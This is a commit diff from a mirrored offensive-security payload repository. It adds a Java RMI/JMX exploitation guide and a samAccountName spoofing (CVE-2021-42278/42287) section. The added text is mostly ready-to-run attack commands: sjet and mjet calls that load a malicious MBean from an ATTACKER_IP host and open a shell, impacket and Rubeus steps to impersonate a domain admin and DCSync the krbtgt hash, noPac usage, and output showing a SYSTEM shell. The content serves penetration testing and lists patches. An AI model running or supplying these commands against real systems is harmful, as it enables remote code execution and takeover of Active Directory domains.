mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
samAccountName spoofing + Java RMI
This commit is contained in:
parent
10974722b1
commit
5714b9c9d7
63
Java RMI/README.md
Normal file
63
Java RMI/README.md
Normal file
@ -0,0 +1,63 @@
|
||||
# Java RMI
|
||||
|
||||
> The attacker can host a MLet file and instruct the JMX service to load MBeans from the remote host.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Exploitation](#exploitation)
|
||||
* [Requirements](#requirements)
|
||||
* [Detection](#detection)
|
||||
* [Remote Command Execution](#remote-command-execution)
|
||||
* [References](#references)
|
||||
|
||||
## Exploitation
|
||||
|
||||
### Requirements
|
||||
- Jython
|
||||
- The JMX server can connect to a http service that is controlled by the attacker
|
||||
- JMX authentication is not enabled
|
||||
|
||||
|
||||
### Detection
|
||||
|
||||
```powershell
|
||||
$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
|
||||
1089/tcp open java-rmi Java RMI
|
||||
| rmi-vuln-classloader:
|
||||
| VULNERABLE:
|
||||
| RMI registry default configuration remote code execution vulnerability
|
||||
| State: VULNERABLE
|
||||
| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
|
||||
| rmi-dumpregistry:
|
||||
| jmxrmi
|
||||
| javax.management.remote.rmi.RMIServerImpl_Stub
|
||||
```
|
||||
|
||||
### Remote Command Execution
|
||||
|
||||
The attack involves the following steps:
|
||||
* Starting a web server that hosts the MLet and a JAR file with the malicious MBeans
|
||||
* Creating a instance of the MBean javax.management.loading.MLet on the target server, using JMX
|
||||
* Invoking the "getMBeansFromURL" method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file.
|
||||
* The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX.
|
||||
* The attacker finally invokes methods from the malicious MBean.
|
||||
|
||||
Exploit the JMX using [sjet](https://github.com/siberas/sjet) or [mjet](https://github.com/mogwailabs/mjet)
|
||||
|
||||
```powershell
|
||||
jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000
|
||||
jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la"
|
||||
jython sjet.py TARGET_IP TARGET_PORT super_secret shell
|
||||
jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password
|
||||
jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall
|
||||
jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx"
|
||||
|
||||
jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000
|
||||
jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami"
|
||||
jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH - 28 APR 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
|
||||
* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security - 26th March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf)
|
@ -14,6 +14,7 @@
|
||||
- [From CVE to SYSTEM shell on DC](#from-cve-to-system-shell-on-dc)
|
||||
- [ZeroLogon](#zerologon)
|
||||
- [PrintNightmare](#printnightmare)
|
||||
- [samAccountName spoofing](#samaccountname-spoofing)
|
||||
- [Open Shares](#open-shares)
|
||||
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
||||
- [SCF Files](#scf-files)
|
||||
@ -672,6 +673,92 @@ Requirements:
|
||||
| 0x180 | unknown error code | Share is not SMB2 |
|
||||
|
||||
|
||||
#### samAccountName spoofing
|
||||
|
||||
**Requirements**
|
||||
* MachineAccountQuota > 0
|
||||
|
||||
**Exploitation**
|
||||
|
||||
0. Create a computer account
|
||||
```powershell
|
||||
impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
|
||||
|
||||
powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force
|
||||
powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose
|
||||
```
|
||||
1. Clear the controlled machine account `servicePrincipalName` attribute
|
||||
```ps1
|
||||
impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
|
||||
|
||||
powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose
|
||||
```
|
||||
2. (CVE-2021-42278) Change the controlled machine account `sAMAccountName` to a Domain Controller's name without the trailing `$`
|
||||
```ps1
|
||||
# https://github.com/SecureAuthCorp/impacket/pull/1224
|
||||
impacket@linux> renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
|
||||
|
||||
powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose
|
||||
```
|
||||
3. Request a TGT for the controlled machine account
|
||||
```ps1
|
||||
impacket@linux> getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
|
||||
|
||||
cmd@windows> Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap
|
||||
```
|
||||
4. Reset the controlled machine account sAMAccountName to its old value
|
||||
```ps1
|
||||
impacket@linux> renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
|
||||
|
||||
powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose
|
||||
```
|
||||
5. (CVE-2021-42287) Request a service ticket with `S4U2self` by presenting the TGT obtained before
|
||||
```ps1
|
||||
# https://github.com/SecureAuthCorp/impacket/pull/1202
|
||||
impacket@linux> KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
|
||||
|
||||
cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT]
|
||||
```
|
||||
6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'`
|
||||
|
||||
Automated exploitation:
|
||||
|
||||
* [noPac - @cube0x0](https://github.com/cube0x0/noPac)
|
||||
```powershell
|
||||
noPac.exe scan -domain htb.local -user user -pass 'password123'
|
||||
noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
|
||||
noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator
|
||||
```
|
||||
* [sam_the_admin - @WazeHell](https://github.com/WazeHell/sam-the-admin)
|
||||
```ps1
|
||||
$ python3 sam_the_admin.py "caltech/alice.cassie:Lee@tPass" -dc-ip 192.168.1.110 -shell
|
||||
[*] Selected Target dc.caltech.white
|
||||
[*] Total Domain Admins 11
|
||||
[*] will try to impersonat gaylene.dreddy
|
||||
[*] Current ms-DS-MachineAccountQuota = 10
|
||||
[*] Adding Computer Account "SAMTHEADMIN-11$"
|
||||
[*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL
|
||||
[*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL.
|
||||
[*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white
|
||||
[*] SAMTHEADMIN-11$ sAMAccountName == dc
|
||||
[*] Saving ticket in dc.ccache
|
||||
[*] Resting the machine account to SAMTHEADMIN-11$
|
||||
[*] Restored SAMTHEADMIN-11$ sAMAccountName to original value
|
||||
[*] Using TGT from cache
|
||||
[*] Impersonating gaylene.dreddy
|
||||
[*] Requesting S4U2self
|
||||
[*] Saving ticket in gaylene.dreddy.ccache
|
||||
[!] Launching semi-interactive shell - Careful what you execute
|
||||
C:\Windows\system32>whoami
|
||||
nt authority\system
|
||||
```
|
||||
|
||||
**Mitigations**:
|
||||
* KB5008602
|
||||
* [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e)
|
||||
* [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041)
|
||||
|
||||
|
||||
### Open Shares
|
||||
|
||||
> Some shares can be accessible without authentication, explore them to find some juicy files
|
||||
@ -3256,3 +3343,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration)
|
||||
* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls)
|
||||
* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
|
||||
* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
|
||||
* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
|
Loading…
Reference in New Issue
Block a user